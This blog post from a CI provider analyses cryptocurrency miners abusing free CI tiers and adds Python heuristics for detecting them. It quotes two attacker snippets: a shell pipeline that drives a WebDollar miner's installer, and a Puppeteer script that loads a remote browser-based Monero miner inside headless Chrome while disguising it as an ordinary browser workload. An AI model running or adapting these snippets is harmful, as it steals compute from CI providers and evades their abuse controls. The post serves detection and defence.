Crypto miners are killing free CI

On September 1st, 2020, GitLab announced that its free CI offering was being restricted in response to "usage." Two months later, TravisCI announced a similar restriction in response to "significant abuse."

Concurrently with these pricing changes, the market capitalization of mineable cryptocurrencies has exploded.

The market capitalization of crypto has jumped from 190bn to 2tn in a single year

These events are related: As the market capitalization of cryptocurrency surged from $190 billion in January of 2020 to $2 trillion in April of 2021, it's become profitable for bad actors to make a full time job of attacking the free tiers of platform-as-a-service providers.

Context

At webapp.io, we help developers build full-stack websites by creating per-branch preview environments and running end-to-end tests for them automatically. This is called CI (Continuous Integration).

Because developers can run arbitrary code on our servers, some of them violate our terms of service by running cryptocurrency miners as a "build step" for their websites. You can learn more in our docs.

717 GitHub commits in one month

"testronan" is an avid Flask user. Every hour they make a commit to their only GitHub repository: "testronan/MyFirstRepository-Flask"

The prolific programmer is certainly making sure that their contributions are well tested. Their repository contains configurations for five different CI providers: TravisCI, CircleCI, GitHub Actions, Wercker, and webapp.io.

Their CI tasks all run "listen.sh", a shell script that feeds a timed sequence of seemingly random numbers and words into a NodeJS program:

(sleep 10; echo 4; sleep 2; echo "tex.webd";sleep 2; echo 7; sleep 1; echo 1; sleep 1; echo "exit"; sleep 2) | stdbuf -oL npm run commands

MyFirstRepository-Flask has nothing to do with Flask or webservers. It hosts cryptocurrency mining scripts that send WebDollar to an anonymous address. The numbers piped in above are the answers to the installation options of the NodeJS implementation of WebDollar.

The repository is not attacking GitHub directly. Instead it abuses the "cron" schedule feature of GitHub Actions to create a new commit every hour, and each commit triggers a build (and therefore an hour of mining) on the four other CI providers.
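Nothing in that pattern is hidden from the hosting provider: the commit cadence, the spread of CI configurations and the workflow schedule are all visible metadata. The following is an added example, not webapp.io's tooling or the attacker's code, of the kind of check a CI provider could run over that metadata to rank a repository for review. The commit log, file list and workflow text are constructed to mirror the repository described above; the mapping from config paths to providers is an assumption (in particular the webapp.io file name), and the thresholds are values a provider would tune.

```python
"""Metadata heuristics for the 'scheduled commit farm' pattern: a repository
that commits on a fixed schedule, changes almost nothing, and carries config
for several CI providers. Sample data below is constructed, not real history."""
import re
from datetime import datetime, timedelta
from statistics import mean, median, pstdev

# Paths (or directory prefixes) whose presence triggers a build on a provider.
# Assumption: this mapping, including 'Layerfile' for webapp.io.
CI_CONFIG_PATHS = {
    ".travis.yml": "TravisCI",
    ".circleci/config.yml": "CircleCI",
    ".github/workflows/": "GitHub Actions",
    "wercker.yml": "Wercker",
    "Layerfile": "webapp.io",
}

CRON_RE = re.compile(r"cron:\s*['\"]?([^'\"\n]+)")


def ci_providers(paths):
    """Map a repository's file list to the set of CI providers it would trigger."""
    found = set()
    for p in paths:
        for prefix, name in CI_CONFIG_PATHS.items():
            if p == prefix or (prefix.endswith("/") and p.startswith(prefix)):
                found.add(name)
    return found


def hourly_or_faster_crons(workflow_text):
    """Return cron expressions in a GitHub Actions workflow whose hour field is
    '*' or '*/1', i.e. schedules that fire at least once an hour."""
    hits = []
    for expr in CRON_RE.findall(workflow_text):
        fields = expr.split()
        if len(fields) == 5 and fields[1] in ("*", "*/1"):
            hits.append(expr.strip())
    return hits


def cadence(timestamps):
    """Mean gap between consecutive commits (seconds) and the coefficient of
    variation of the gaps; a value near 0 means machine-like regularity."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None, None
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else float("inf"))


def assess(commits, paths, workflow_text=""):
    """commits: list of (datetime, lines_changed). Returns (suspicious, findings)."""
    findings = []
    mean_gap, cv = cadence([c[0] for c in commits])
    if mean_gap is not None and len(commits) >= 24 and cv < 0.05 and 3000 <= mean_gap <= 4200:
        findings.append(f"{len(commits)} commits at a fixed ~{mean_gap / 60:.0f} min interval")
    if commits and median(c[1] for c in commits) <= 2:
        findings.append("commits change almost nothing (median <= 2 lines)")
    providers = ci_providers(paths)
    if len(providers) >= 3:
        findings.append(f"configured for {len(providers)} CI providers: {', '.join(sorted(providers))}")
    crons = hourly_or_faster_crons(workflow_text)
    if crons:
        findings.append(f"GitHub Actions schedule fires at least hourly: {crons}")
    # Any single signal has benign explanations; three together rarely do.
    return len(findings) >= 3, findings


# Constructed sample: 48 commits, one per hour with a few seconds of jitter,
# each touching one line, in a repository configured for five CI providers.
START = datetime(2021, 4, 1, 0, 0, 0)
SAMPLE_COMMITS = [(START + timedelta(hours=i, seconds=(i * 7) % 20), 1) for i in range(48)]
SAMPLE_PATHS = [".travis.yml", ".circleci/config.yml", ".github/workflows/cron.yml",
                "wercker.yml", "Layerfile", "listen.sh", "package.json"]
SAMPLE_WORKFLOW = """
on:
  schedule:
    - cron: '0 * * * *'
"""

if __name__ == "__main__":
    suspicious, why = assess(SAMPLE_COMMITS, SAMPLE_PATHS, SAMPLE_WORKFLOW)
    print("suspicious" if suspicious else "ok")
    for f in why:
        print(" -", f)
```

The score is meant to queue a repository for a human look rather than to block it: a monorepo with several CI configs, or a bot that bumps a dependency lockfile hourly, will each trip one signal, and the combination is what separates them from a mining farm.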

At WebDollar's April peak price of $0.0005, the repository was making $77 USD per month, a considerable sum in many countries, especially given that the only tools required are a laptop and an internet connection.

The two wallet addresses that receive these coins are:

Headless browser cryptocurrency mining

"vippro99" is less subtle about their intentions. Out of dozens of repositories, most are related to cryptocurrency or browser automation.

The nodejs-monney repository contains various scripts that start instances of Chrome with Google's popular Puppeteer project.

The idea is simple: mining cryptocurrency directly in CI is fairly easy to detect (by content analysis of the executables a job runs, for example), whereas browser automation is an ordinary CI workload, so a miner running inside a headless browser blends in.

const puppeteer = require('puppeteer');

puppeteer.launch({
  headless: true,
  args: ['--no-sandbox', '--disable-setuid-sandbox', '--window-size=500,500',
    // spoofed desktop Chrome on macOS user agent
    '--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36']
}).then(async browser => {
  console.log('-- Running chrome!!');
  const page = await browser.newPage();
  // load the miner page hosted on GitHub Pages
  await page.goto('https://vippro99.github.io/-meocoder-nodejs-tool/index.html');
  // relay the page's console output into the job log
  page.on('console', (msg) => console.log(msg.text()));
  // keep the page (and the miner in it) open for a random 52 to 57 minutes, then stop
  await page.waitForTimeout(((Math.floor(Math.random() * 6) + 52) * 60) * 1000);
  await browser.close();
});

The referenced GitHub pages website contains a simple browser-based Monero miner, reminiscent of Coinhive.
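Because the miner hides behind a workload CI providers expect to see, checking the script's content is weak; the distinguishing signal is behavioural. As an added example that is not part of the original post or the attacker's code, the following check classifies a job from per-process CPU samples: an end-to-end test drives the browser in bursts, while an in-page miner keeps a renderer pinned until the timeout above expires. Process names, PIDs and readings are constructed sample data, and the sampling interval and thresholds are assumptions a provider would tune.

```python
"""Behavioural check for headless-browser mining: watch what the browser
processes in a CI job actually do rather than what the script says.
All job samples below are constructed, not captured from a real job."""

BROWSER_NAMES = ("chrome", "chromium", "headless_shell")


def longest_saturated_run(samples, threshold=85.0):
    """samples: list of (seconds_since_job_start, cpu_percent) for one
    process, in time order. Returns the longest stretch (seconds) during
    which every sample stayed at or above `threshold`."""
    best, run_start = 0, None
    for t, cpu in samples:
        if cpu >= threshold:
            if run_start is None:
                run_start = t
            best = max(best, t - run_start)
        else:
            run_start = None
    return best


def flag_mining(process_samples, min_seconds=600, threshold=85.0):
    """process_samples maps (pid, command line) to that process's CPU samples.
    Returns browser processes that saturated a core for at least `min_seconds`
    without a break; a test suite never holds a renderer that long."""
    flagged = []
    for (pid, cmd), samples in process_samples.items():
        if not any(b in cmd for b in BROWSER_NAMES):
            continue
        run = longest_saturated_run(samples, threshold)
        if run >= min_seconds:
            flagged.append((pid, cmd, run))
    return flagged


# Constructed sample jobs: one CPU reading every 30 s over a 55-minute job.
INTERVAL, JOB_LEN = 30, 3300

MINER_JOB = {
    # the page loads, then the in-page miner runs flat out until the script's timeout
    (4242, "chrome --headless --no-sandbox"): [
        (t, 20.0 if t < 30 else 96.0) for t in range(0, JOB_LEN, INTERVAL)],
    (4100, "node index.js"): [(t, 5.0) for t in range(0, JOB_LEN, INTERVAL)],
}

E2E_JOB = {
    # a test suite: ~90 s of rendering, then idle while fixtures and assertions run
    (5151, "chrome --headless"): [
        (t, 92.0 if (t // INTERVAL) % 8 < 3 else 4.0) for t in range(0, JOB_LEN, INTERVAL)],
    (5000, "node node_modules/.bin/jest"): [
        (t, 60.0) for t in range(0, JOB_LEN, INTERVAL)],
}

if __name__ == "__main__":
    for name, job in (("miner", MINER_JOB), ("e2e", E2E_JOB)):
        print(name, flag_mining(job) or "clean")
```

The check only needs the process table and CPU accounting the job's container already exposes, so an attacker cannot hide from it by renaming files or obfuscating scripts; they can only mine less, which is the point.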

As of writing, the account is attacking JFrog's Shippable CI, which (perhaps relatedly) announced the end of its free tier earlier this year.

"vippro99"'s comments indicate that they are in Vietnam. At the current price of Monero, each instance of their cryptocurrency miner on Shippable yields about $2.50 USD per month, so maintaining a mere 60 concurrent instances would be equivalent to a full-time job in that country.

A solution for crypto

Ethereum, the second most popular cryptocurrency, recently announced plans to fully disable computation-based mining as the way new ether is issued, switching entirely to a proof-of-stake (PoS) validation model.

Beyond the environmental impact of traditional "proof of work" mining, there are externalities in many other fields like worldwide GPU shortages and attacks on free tiers of compute platforms like CI.

Providers can do their best to enforce their terms of service, but as long as such attacks are profitable and untraceable, they will keep growing more sophisticated and circumventing countermeasures. The only long-term way we will continue to enjoy free tiers on Heroku, Netlify, and GitHub is to switch away from proof-of-work.

Discussion: HackerNews, r/programming